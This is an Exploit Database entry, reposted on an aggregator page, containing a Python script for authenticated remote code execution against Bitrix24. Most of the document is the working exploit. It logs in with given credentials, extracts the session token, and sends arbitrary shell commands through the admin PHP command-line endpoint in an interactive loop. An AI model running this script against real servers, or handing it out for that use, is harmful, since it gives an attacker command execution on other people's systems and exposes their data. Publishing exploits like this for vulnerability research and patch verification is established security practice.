Bitrix24 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 15 阅读

• 作者： heinjame
  日期： 2022-05-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50898/

• # Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)
  # Date: 4/22/2022
  # Exploit Author: picaro_o
  # Vendor Homepage: https://www.bitrix24.com/apps/desktop.php
  # Tested on: Linux os
  
  #/usr/bin/env python
  #Created by heinjame
  
  
  import requests
  import re
  from bs4 import BeautifulSoup
  import argparse,sys
  
  user_agent = {'User-agent': 'HeinJame'}
  
  parser = argparse.ArgumentParser()
  parser.add_argument("host", help="Betrix URL")
  parser.add_argument("uname", help="Bitrix Username")
  parser.add_argument("pass", help="Bitrix Password")
  pargs = parser.parse_args()
  url = sys.argv[1]
  username = sys.argv[2]
  password = sys.argv[3]
  
  inputcmd = input(">>")
  s = requests.Session()
  def login():
  	
  	postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password}
  	r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata)
  def getsessionid():
  	sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en",
  headers = user_agent)
  	session = re.search(r"'bitrix_sessid':.*", sessionid.text)
  	extract = session.group(0).split(":")
  	realdata = extract[1].strip(" ")
  	realdata = realdata.replace("'","")
  	realdata = realdata.replace(",","")
  	return realdata
  	# print(r.text)
  def cmdline(cmd,sessionid):
  	cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'}
  	usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers
  = user_agent, data = cmdline)
  	soup = BeautifulSoup(usercmd.content,'html.parser')
  	cmd = soup.find('p').getText()
  	print(cmd.rstrip())
  login()
  sessionid = getsessionid()
  while inputcmd != "exit":
  		cmdline(inputcmd,sessionid)
  		inputcmd = input(">>")